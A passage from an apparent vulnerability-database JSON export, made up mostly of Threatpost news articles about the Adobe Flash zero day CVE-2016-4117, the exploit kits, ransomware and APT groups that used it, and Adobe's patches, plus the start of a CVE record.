victims\u2019 machines; Locky was blamed for a number of high-profile infections at hospitals nationwide.\n\nCerber has been climbing the ranks of ransomware\u2014along with CryptXXX\u2014after FireEye said attackers have leveraging the [same spam infrastructure](<https://threatpost.com/cerber-ransomware-on-the-rise-fueled-by-dridex-botnets/118090/>) used to spread the dangerous Dridex banking malware. Cerber has an annoying feature in which it uses text-to-speech technology to audibly read its ransom note to its victims.\n\n_This article was updated May 23 to reflect the addition of the Flash zero day into the Angler Exploit Kit. _\n", "cvss3": {}, "published": "2016-05-23T10:04:52", "type": "threatpost", "title": "Exploit Kits Attacking Adobe Flash Player Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-23T21:34:40", "id": "THREATPOST:8D1613F1DDC8479184A4F8C93BA951EF", "href": "https://threatpost.com/two-exploit-kits-spreading-attacks-for-recent-flash-player-zero-day/118236/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:21", "description": "As promised earlier this week, Adobe today released an updated version of Flash Player that includes a [patch for a zero-day vulnerability](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>).\n\nAdobe said it is aware of the existence of a public exploit for CVE-2016-4117, but said the flaw has not been publicly attacked.\n\nThe vulnerability affects Flash Player versions 21.0.0.226 and earlier on Windows, Mac OS X, Linux and Chrome OS.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said Tuesday in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>).\n\nAdobe patched the zero day on the Desktop and Extended Support releases of Flash Player, as well as for Google Chrome and Microsoft Edge and Internet Explorer 11 browsers; all of which were given the most critical severity rating.\n\nThe zero day is a type confusion vulnerability and it exposes the underlying operating system to remote code execution. Researcher Genwei Jiang of FireEye is credited with privately disclosing the issue to Adobe.\n\nThe update patches 25 vulnerabilities in total, two of which are type confusion flaws, including the zero day. A dozen memory corruption vulnerabilities were addressed that also lead to remote code execution, along with eight use-after-free flaws also exposing systems to remote code execution.\n\nAdobe also patched buffer overflow and heap buffer overflow flaws, as well as a vulnerability in the directory search path, that allow remote code execution.\n\nOn Tuesday, Adobe gave advanced notification of the zero day and said it would have an update ready by today. It also released [updated versions of Adobe Acrobat, Adobe Reader and ColdFusion](<https://threatpost.com/adobe-warns-of-flash-zero-day-patches-acrobat-reader/117981/>), patching 95 vulnerabilities.\n\nToday\u2019s is the second emergency update to Adobe Flash Player in a little more than a month. On April 7, a zero day was patched in Flash after [attacks were discovered in two exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>) that were pushing ransomware onto compromised machines.\n\nAttackers used the previously unpatched flaw in Flash to infect victims with either Locky or Cerber ransomware. Until then, Locky spread primarily via spam with attachments enticing users to enable macros in Word documents that download the malware onto machines. Cerber is also crypto-ransomware that includes a feature where the infected machine will speak to the victim via a text-to-speech engine.\n", "cvss3": {}, "published": "2016-05-12T12:55:08", "type": "threatpost", "title": "Adobe Emergency Update Patches Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-19T19:03:18", "id": "THREATPOST:57A3C5842284FA1358A0BA67A4DECF7D", "href": "https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:21", "description": "Adobe rolled out security updates for three of its products on Tuesday, including 95 fixes it pushed for Acrobat, Reader, and ColdFusion.\n\nUsers will have to wait until later this week, however, to patch [a critical vulnerability that exists in Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>). It may only be a matter of time until the vulnerability is publicly exploited; Adobe claims that it isn\u2019t aware of any active exploits for the issue but is aware of a report that an exploit for the vulnerability, CVE-2016-4117, exists in the wild.\n\nThe zero day, dug up by Genwei Jiang, a researcher at FireEye, exists in Flash 21.0.0.226 and earlier versions for Windows, Mac, Linux, and Chrome OS, Adobe warned Tuesday. If exploited, the vulnerability could cause a crash and let an attacker take control of the system. A fix for the issue was not ready in time to ship with this week\u2019s Patch Tuesday patches but the company claims it is planning to address the issue later in the week, potentially as early as Thursday.\n\nAs far as today\u2019s patches go, 92 of the 95 issues that were fixed, address [vulnerabilities in either Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb16-14.html>), the bulk of which were use-after-free vulnerabilities or memory corruption vulnerabilities that could lead to code execution, Adobe warns.\n\nA handful of other vulnerabilities fixed on Tuesday, including issues in the directory search path, an integer overflow vulnerability, and heap buffer overflow vulnerabilities, could also lead to code execution. Other vulnerabilities could lead to information disclosure, memory leak, or the bypassing of restrictions on Javascript API execution.\n\nWhile none of the Reader or Acrobat vulnerabilities are being exploited in the wild to Adobe\u2019s knowledge, the company has still branded them critical, because they could enable an attacker to take control of a system.\n\nThree vulnerabilities [were fixed in ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb16-16.html>), including hotfixes for version 10, 11, and the 2016 release. The fixes address an input validation issue that could lead to cross-site scripting (XSS) attacks, a host name verification problem with wild card certificates, and an Apache Commons update to mitigate java deserialization.\n\nThe 95 patches mark a serious uptick from the last time Adobe updated Acrobat and Reader; when it released updates in March it only patched three CVEs combined between the two products.\n\nThe company was forced to issue [an emergency update for Flash](<https://threatpost.com/emergency-update-coming-for-flash-vulnerability-under-attack/117219/>) last month after a vulnerability in version 21.0.0.197 was discovered and eventually rolled into [two exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>) and used to peddle ransomware.\n", "cvss3": {}, "published": "2016-05-10T13:56:58", "type": "threatpost", "title": "Adobe Patches 95 Vulnerabilities in Acrobat, Reader, Warns of Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-10T17:56:58", "id": "THREATPOST:11EA26F57D7D2191ABB8BCEDAE972C5B", "href": "https://threatpost.com/adobe-warns-of-flash-zero-day-patches-acrobat-reader/117981/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Adobe on Thursday patched a zero-day vulnerability in [Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb16-18.html>) that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia.\n\nResearchers at Kaspersky Lab [privately disclosed the flaw to Adobe](<https://threatpost.com/fix-coming-for-flash-vulnerability-under-attack/118652/>) after exploits against the zero-day were used in March by the [ScarCruft APT](<https://securelist.com/blog/research/75082/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/>) gang in what Kaspersky Lab is calling [Operation Daybreak](<https://securelist.com/blog/research/75100/operation-daybreak/>).\n\nResearchers said the group has a number of operations under way and that it has two Flash exploits and another against Microsoft\u2019s Internet Explorer at its disposal. Kaspersky speculates that this group could also be behind another zero-day, [CVE-2016-0147](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0147>), a vulnerability in Microsoft XML Core Services that was patched in April.\n\nIn a report from Kaspersky Lab, researchers said the vulnerability is in Flash code that parses ExecPolicy metadata. ScarCruft\u2019s exploit implements read/write operations at a particular address in memory that can allow for full remote code execution. Full details are explained in the Kaspersky Lab report published today.\n\nThe attack happens in stages starting with shellcode downloading and executing a malicious DLL that loads in Flash and also includes a technique designed to bypass antivirus detection using the Windows DDE component, or Dynamic Data Exchange, a protocol that facilitates data transfers between applications.\n\nKaspersky researchers said this part of the attack makes \u201cclever\u201d use of Windows DDE.\n\n\u201cThe main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed,\u201d Kaspersky Lab said in its report. \u201cThis is an undocumented behavior in Microsoft Windows.\u201d\n\nKaspersky\u2019s research indicates there have been more than two dozen Operation Daybreak victims to date, including an Asian law enforcement agency, a large Asian trading company, an American mobile advertising company and individuals affiliated with the International Association of Athletics Federations (IAAF), some of which were compromised in the past few days.\n\nAttacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks. The exploit kit eventually redirects victims\u2019 browsers to a server in Poland controlled by the attackers.\n\n\u201cThe ScarCruft APT group is a relatively new player and managed to stay under the radar for some time,\u201d researchers wrote. \u201cIn general, their work is very professional and focused. Their tools and techniques are well above the average.\u201d\n\nAnother set of attacks called Operation Erebus leverages another Flash exploit, [CVE-2016-4117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117>), and relies on watering hole attacks as a means of propagation. [Watering hole attacks](<https://threatpost.com/why-watering-hole-attacks-work-032013/77647/>) involved compromising a site frequented by the target and serving exploits to site visitors that redirects to malware, often spy tools.\n\nAdobe has implemented a number of mitigations in Flash that defend against memory-based attacks in particular that also make zero days incrementally difficult. While Adobe and outside researchers continue to find and patch critical issues in Flash Player, publicly attacks against unknown Flash flaws are much less frequent.\n\n\u201cNowadays, in-the-wild Flash Player exploits are becoming rare. This is because in most cases they need to be coupled with a Sandbox bypass exploit, which makes them rather tricky. Additionally, Adobe has been doing a great job at implementing new mitigations to make exploitation of Flash Player more and more difficult,\u201d Kaspersky researchers wrote. \u201cNevertheless, resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets.\u201d\n\nGoogle Project Zero team researcher Natalie Silvanovich said that efforts by Adobe to introduce new exploit mitigations into the Flash Player code base have slowed down exploit development and made it more difficult for researchers looking for bugs.\n\nDuring the Infiltrate Conference in Miami in April, Silvanovich said during a presentation that, for example, use-after-free bugs are more difficult to exploit and that other classes of vulnerabilities such as redefinition bugs may be going away. She added that information garnered from the Hacking Team data breach last summer was also important to her work. \u201cThe Hacking Team dump was an unprecedented source of information on how Flash exploits work in the wild,\u201d she said during her talk.\n\nThursday\u2019s Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171. Desktop versions 21.0.0.242 and earlier on Windows and Mac machines are affected and users should upgrade to 22.0.0.192.\n\nThe majority of the vulnerabilities patched today are memory corruption flaws. The update also takes care of type-confusion, use-after-free, buffer overflow and directory search path vulnerabilities as well a same-origin policy bypass flaw that exposes machines to information disclosure attacks.\n", "cvss3": {}, "published": "2016-06-17T06:00:38", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Under Attack by APT Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0147", "CVE-2016-4117", "CVE-2016-4171"], "modified": "2016-06-20T17:57:07", "id": "THREATPOST:65788483E3FE6F5E155BBFDFEB0DB640", "href": "https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A ransomware attack that closed off access to personal and shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.\n\nKafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.\n\nUniversity College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). As of Friday, personal storage and shared drives had been restored, and yesterday, write-access to the remaining shared drives was also restored.\n\nThe infection, the university said, was contained by last Thursday and that it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.\n\nA dozen local and shared drives were infected, and the school initially called it a \u201czero-day attack.\u201d\n\n\u201cOur antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,\u201d officials said last week. \u201cWe cannot currently confirm the ransomware that was deployed.\u201d\n\nProofpoint said AdGholas\u2019 use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.\n\nAfter ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.\n\n\u201cAt that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,\u201d Kafeine wrote. \u201cWe confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.\u201d\n\nThe compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.\n\n\u201cAstrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May, Kafeine said, identifying a number of vulnerabilities exploit by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. \u201cThe introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.\u201d\n\nThe exploit kit was spreading Mole ransomware on two days, June 14 and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.\n\nMole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.\n\n\u201c[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,\u201d Kafeine wrote. \u201cFull HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value website and targets.\u201d\n", "cvss3": {}, "published": "2017-06-20T14:27:43", "type": "threatpost", "title": "UCL Ransomware Linked to AdGholas Malvertising Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2017-06-20T18:27:43", "id": "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "href": "https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:43", "description": "When an exploit kit fades away, it usually doesn\u2019t take long for another to take its place in the limelight, especially when the kit is an integral part of the ransomware ecosystem.\n\nThat\u2019s exactly what\u2019s happened over the past few weeks as researchers say they\u2019ve seen an uptick in RIG Exploit Kit traffic used to peddle CrypMIC ransomware.\n\nThe news comes two weeks [after researchers shut down a global malvertising campaign](<https://threatpost.com/malvertising-campaign-pushing-neutrino-exploit-kit-shut-down/120322/>) that was delivering the same ransomware but via the Neutrino Exploit Kit. While RIG is far from new \u2013 it was pushing Cryptowall ransomware on victims [as far back as 2014](<https://threatpost.com/rig-exploit-kit-pushing-cryptowall-ransomware/106540/>) \u2013 it has enjoyed a spike in the days following Neutrino\u2019s decline, researchers say.\n\nAccording to experts at Heimdal Security, who have tracked the kit\u2019s traffic over the past 20 days, it\u2019s [picking up where Neutrino left off](<https://heimdalsecurity.com/blog/security-alert-rig-exploit-kit-crypmic-ransomware/>). A new campaign is using script injection to compromise legitimate websites and redirect victims to hijacked domains pushing CrypMIC. Andra Zaharia, a security evangelist with the Danish firm, said some attacks are using malicious iFrame HTML code as the injects.\n\nRIG is using a technique previously utilized by the Angler Exploit Kit, [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396/>), to redirect users. Attackers use stolen domain credentials to set up subdomains to divert traffic to the arbitrary sites. Domain owners are often none the wiser because many neglect to monitor their login credentials and fail to notice after they\u2019ve been compromised in a phishing attack.\n\nAccording to Zaharia, the new campaign bears a resemblance to [Pseudo-Darkleech](<https://threatpost.com/the-changing-face-of-pseudo-darkleech/119036/>), a campaign that\u2019s been used for more than a year now to deliver exploit kits. Both campaigns use similar patterns when it comes to injecting malicious scripts and redirecting traffic to the exploit kit infrastructure, Zaharia said.\n\nResearchers with Cisco Talos, who took down the Neutrino-CrypMIC campaign 20 days ago, believe it exposed roughly one million users to malicious ads for the two weeks they followed it in early August. The researchers worked with GoDaddy to subsequently shut down domains that were being used by the campaign to redirect traffic to a server hosting Neutrino in Russia.\n\nThe RIG-CrypMIC campaign takes advantage of recent vulnerabilities in Adobe Flash Player, according to Heimdal. Following the exploit, CrypMIC is dropped into a Windows temporary folder with a random name. From there, the malware connects to a command and control server.\n\nWhile Zaharia told Threatpost they don\u2019t have the traffic numbers in full, she did confirm the payload\u2019s delivery efficiency is at 35.6 percent, spread out across different Flash exploits.\n\nThe exploits include CVE-2015-8651, a vulnerability that Adobe patched last December, and CVE-2016-4117, a zero day vulnerability [the company patched in May](<https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/>). Attackers embedded CVE-2016-4117 into Neutrino a week after it was patched by the company and the Scarcruft APT gang, a group that was spotted targeting Russia, Nepal, and South Korea, also leveraged the exploit. According to researchers at Kaspersky Lab, who identified the group in June, Scarcruft paired the exploit with watering hole attacks as part of [Operation Erebus](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), a series of attacks carried out in spring.\n\nThe campaign also uses an IE zero day, CVE-2016-0189, that Microsoft patched in May to carry out attacks. Developers behind Neutrino [incorporated that vulnerability into the exploit kit in July](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>).\n\nThe moves are positioning RIG to be the definitive exploit kit, for now at least, Zaharia said.\n\n\u201cWhen it comes to exploit kits, the dynamic is incredibly fast-moving. In the past month, two of the biggest exploit kit infrastructures were either taken down or suffered a big hit, so one of the other notorious exploit kits is bound to take advantage of the opportunity,\u201d Zaharia told Threatpost Wednesday, \u201cRIG is shaping up to be the go-to EK, but Magnitude, Sundown or others could also be working on their next big move.\n", "cvss3": {}, "published": "2016-09-21T09:29:38", "type": "threatpost", "title": "Picking Up Where Neutrino Left Off: RIG Pushing CrypMIC Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-8651", "CVE-2016-0189", "CVE-2016-4117"], "modified": "2016-09-21T13:29:38", "id": "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "href": "https://threatpost.com/rig-picks-up-where-neutrino-left-off-pushes-crypmic-ransomware/120735/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "A nasty Adobe Flash zero-day vulnerability that was remediated in an [emergency update in October 2015](<https://threatpost.com/emergency-adobe-flash-zero-day-patch-arrives-ahead-of-schedule/115073/>) was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future.\n\nThe Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was [singled out by Microsoft](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) for using separate Flash and Windows zero days in targeted attacks this year.\n\nThe Flash bug was among the first to be used after Adobe implemented new mitigations into the software to combat memory-based attacks. Despite the improvements in Flash security, attackers still take a shine to these exploits.\n\nRecorded Future\u2019s report \u201c[New Kit, Same Player](<https://www.recordedfuture.com/top-vulnerabilities-2016/>)\u201d says that six of the top 10 vulnerabilities used in exploit kits were Flash Player bugs, followed by Internet Explorer, Windows and Silverlight exploits. None of this year\u2019s top 10 vulnerabilities were present in a similar analysis done last year.\n\nExploit kits, meanwhile, have been reduced in prominence since the disappearance of a number of popular kits, including Angler and Nuclear. Angler, in particular, was particularly popular with criminals; it was updated frequently and sold in a number of underground forums. The June arrest of a Russian cybercrime outfit behind the Lurk Trojan, however, spelled the end of days for Angler. Researchers at Kaspersky Lab [confirmed the connection](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) between the [Lurk gang and Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>) distribution in an August report.\n\nNonetheless, exploit kits remain a threat and a vehicle for attacks that include ransomware, click fraud and adware. Victims are compromised in a number of ways, including drive-by attacks, malvertising or links in emails, all of which direct the victim\u2019s browser to the exploit kit\u2019s landing page. Code on the page determines the browser being used and launches the exploit mostly likely to hit paydirt.\n\nCVE-2015-7645 was found in Angler, as well as in Neutrino, Magnitude, RIG, Nuclear Pack, Spartan and Hunter. It, by far, had the highest penetration into exploits kits, according to Recorded Future.\n\nBut since Angler\u2019s demise earlier this year, Sundown has risen to a measure of prominence with its maintainers updating the kit often with new exploits. Sundown\u2019s payload, however, differs in that it drops banking Trojans on users\u2019 machines. Recorded Future said this kit also relies on domain shadowing more than its counterparts in order to register subdomains that are used to host attacks.\n\nSundown also contained CVE-2016-0189, an [Internet Explorer bug](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>) used in targeted attacks against South Korean organizations earlier this year. Microsoft patched it in July, but already it had been used by Neutrino as well. The IE bug, Recorded Future said, was the top flaw found in exploit kits, referenced more than 600 times. CVE-2016-1019 and CVE-2016-4117, two other Flash Player bugs, round out the top three. [CVE-2016-4117](<https://securelist.com/blog/research/75100/operation-daybreak/>) was used by the [ScarCruft APT group](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), Kaspersky Lab researchers said in June, in watering hole attacks.\n", "cvss3": {}, "published": "2016-12-06T13:58:56", "type": "threatpost", "title": "Flash Exploit Found in Seven Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-7645", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-12-07T14:36:02", "id": "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "href": "https://threatpost.com/flash-exploit-found-in-seven-exploit-kits/122284/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:18", "description": "Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence on machines.\n\nJuan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab\u2019s [Global Research and Analysis Team,](<https://securelist.com/apt-trends-report-q2-2017/79332/>) described some of tactics the researchers have seen in Q2 2017 in [a webinar](<https://www.brighttalk.com/webcast/15591/273279>) Tuesday morning. The company used the webinar and [the quarterly report it was based on](<https://securelist.com/apt-trends-report-q2-2017/79332/>) to help pull back the veil on threats previously covered by its private intelligence reporting service.\n\nA chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.\n\nSofacy, the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) to election hacks, began using two new macro techniques in April. One abused Windows\u2019 certutil utility to extract payloads\u2014the first time the researchers had seen that technique used\u2014another embedded payloads in the EXIF metadata of malicious Office documents.\n\n\u201cAfter we started digging into this we found that they were actually using this technique dating back to December 2016,\u201d Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.\n\nIn June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.\n\nBartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.\n\n\u201cThere were some infrastructure ties there,\u201d Bartholomew said, \u201cThere was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn\u2019t seen before. We don\u2019t know why that\u2019s the case, it could be that they hired a developer who just refuses to write anything but Delphi. Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi\u2014compared to the other Delphocy payload\u2014and ties to the infrastructure to Sofacy.\u201d\n\nEarlier this spring researchers said they were able to make a potential link between Turla, the APT [linked to Moonlight Maze at SAS](<http://the APT linked to Moonlight Maze at SAS earlier this year>) earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.\n\n\u201cWhat\u2019s interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy,\u201d Bartholomew said.\n\nBartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern-speaking group that\u2019s believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.\n\nHe claims the group, which he\u2019s spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. The exploit\u2019s end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.\n\n\u201cWe\u2019re currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months,\u201d Bartholomew said.\n\nCiting their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it\u2019s the first example of a NOBUS\u2014NObody But US backdoor\u2014they\u2019ve seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.\n\nAnother backdoor, Gray Lambert\u2014an extension of the [Lamberts APT](<https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900/>) group\u2014is much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it\u2019s ready to be used.\n\n\u201cWhat makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines,\u201d Guerrero-Saade said. \u201cWith Gray Lambert installed on these machines [attackers] can essentially decide how they\u2019re going to space their payloads, their commands and attacks.\u201d\n\nThe researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It\u2019s likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the [NSO Group to the Mexican government](<https://threatpost.com/mexican-journalists-lawyers-focus-of-government-spyware/126367/>), will remain popular as well, Guerrero-Saade and Bartholomew said.\n\nThe trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it\u2019s a curious question whether or not the technique will ever be embraced by cybercriminals.\n\n\u201cWe\u2019ve been talking about incompetent people entering the ransomware space for a quite some time now,\u201d Guerrero-Saade said, \u201cWe\u2019re going to see people who are poor coders and won\u2019t even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn\u2019t do anything but tries to get money out of na\u00efve or unsuspecting victims. The notion of wipers as ransomware is quite different. It\u2019s an interesting phenomenon.\u201d\n\n\u201cSabotage attacks and wiper attacks are a strange occurrence, they don\u2019t happen that often. I think over the past 10 years we\u2019ve looked at 10 cases tops. They\u2019re very rare components. For the most part I think it has to do with the level of access that you\u2019re burning whenever you use them,\u201d Guerrero-Saade said, \u201cIf you\u2019re a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. It\u2019s a strange circumstance where the calculus pays off.\u201d\n\nWhile it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it\u2019s not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.\n\n\u201cLet\u2019s say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it\u2019s not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It\u2019s an evolution that\u2019s particularly troubling,\u201d Guerrero-Saade said.\n", "cvss3": {}, "published": "2017-08-08T16:34:08", "type": "threatpost", "title": "Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261"], "modified": "2017-08-22T12:54:04", "id": "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "href": "https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T13:51:35", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-11T01:59:00", "type": "cve", "title": 